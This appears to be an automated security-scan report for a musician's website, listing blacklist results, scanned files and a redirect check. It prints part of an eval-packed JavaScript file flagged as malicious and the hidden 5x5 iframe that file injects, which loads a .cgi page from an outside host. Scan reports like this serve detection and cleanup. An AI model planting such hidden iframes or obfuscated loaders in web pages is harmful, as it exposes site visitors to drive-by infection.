Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=garettbrennan.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://garettbrennan.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://garettbrennan.com/ | 200 OK Content-Length: 20247 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.threepin.org <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8" /> <title>Garett Brennan :: Official Artist Page :: Home</title> <meta name="description" content="" />...[4210 bytes skipped]... | ||
http://garettbrennan.com/updates/concrete5.5.2.1/concrete/js/jquery.js?v=1fd0ac8b8a3af203f29daaf9a69683d6 | 200 OK Content-Length: 93866 Content-Type: application/javascript | clean |
http://garettbrennan.com/updates/concrete5.5.2.1/concrete/js/ccm.base.js?v=1fd0ac8b8a3af203f29daaf9a69683d6 | 200 OK Content-Length: 2450 Content-Type: application/javascript | clean |
http://garettbrennan.com/packages/theme_garett_brennan/blocks/gallery/templates/garett_brennan/js/jquery.lightbox-0.5.pack.js?v=1fd0ac8b8a3af203f29daaf9a69683d6 | 200 OK Content-Length: 6451 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(6($){$.2N.3g=6(4){4=23.2H({2B:\'#34\',2g:0.8,1d:F,1M:\'18/5-33-Y.16\',1v:\'18/5-1u-2Q.16\',1E:\'18/5-1u-2L.16\',1W:\'18/5-1u-2I.16\',19:\'18/5-2F.16\',1f:10,2A:3 Antivirus reports:
Hidden iFrame found. size: 5x5 src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8 <iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"> | ||
http://garettbrennan.com/files/4713/2345/2750/capo.jpg | 200 OK Content-Length: 44599 Content-Type: image/jpeg | clean |
http://garettbrennan.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://garettbrennan.com/files/4613/2345/2744/bus_writing.jpg | 200 OK Content-Length: 64637 Content-Type: image/jpeg | clean |
http://garettbrennan.com/files/5013/2345/2756/GB_JW.jpg | 200 OK Content-Length: 86063 Content-Type: image/jpeg | clean |
http://garettbrennan.com/files/1213/2345/2766/jan_tour.jpg | 200 OK Content-Length: 67634 Content-Type: image/jpeg | clean |
http://garettbrennan.com/files/3913/2345/2761/GSL_OCT.jpg | 200 OK Content-Length: 119897 Content-Type: image/jpeg | clean |
http://garettbrennan.com/files/9113/2345/2735/bubba_GB.jpg | 200 OK Content-Length: 71531 Content-Type: image/jpeg | clean |
http://garettbrennan.com/files/9812/9196/4607/cookie_studio.jpg | 200 OK Content-Length: 147767 Content-Type: image/jpeg | clean |
http://garettbrennan.com/files/5912/8596/1905/image1.jpg | 200 OK Content-Length: 128175 Content-Type: image/jpeg | clean |
http://garettbrennan.com/files/6312/8631/7900/10062271141_dnzjn.jpg | 200 OK Content-Length: 55735 Content-Type: image/jpeg | clean |
http://garettbrennan.com/files/3212/8631/3214/10061259516_X3bBg.jpg | 200 OK Content-Length: 67207 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: garettbrennan.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 22 Dec 2014 07:15:27 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Length: 20247
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: CONCRETE5=CsV9mzb5eqcssbx2WywHx2; path=/
...20247 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: garettbrennan.com
Referer: http://www.google.com/search?q=garettbrennan.com
Result:
The result is similar to the first query. There are no suspicious redirects found.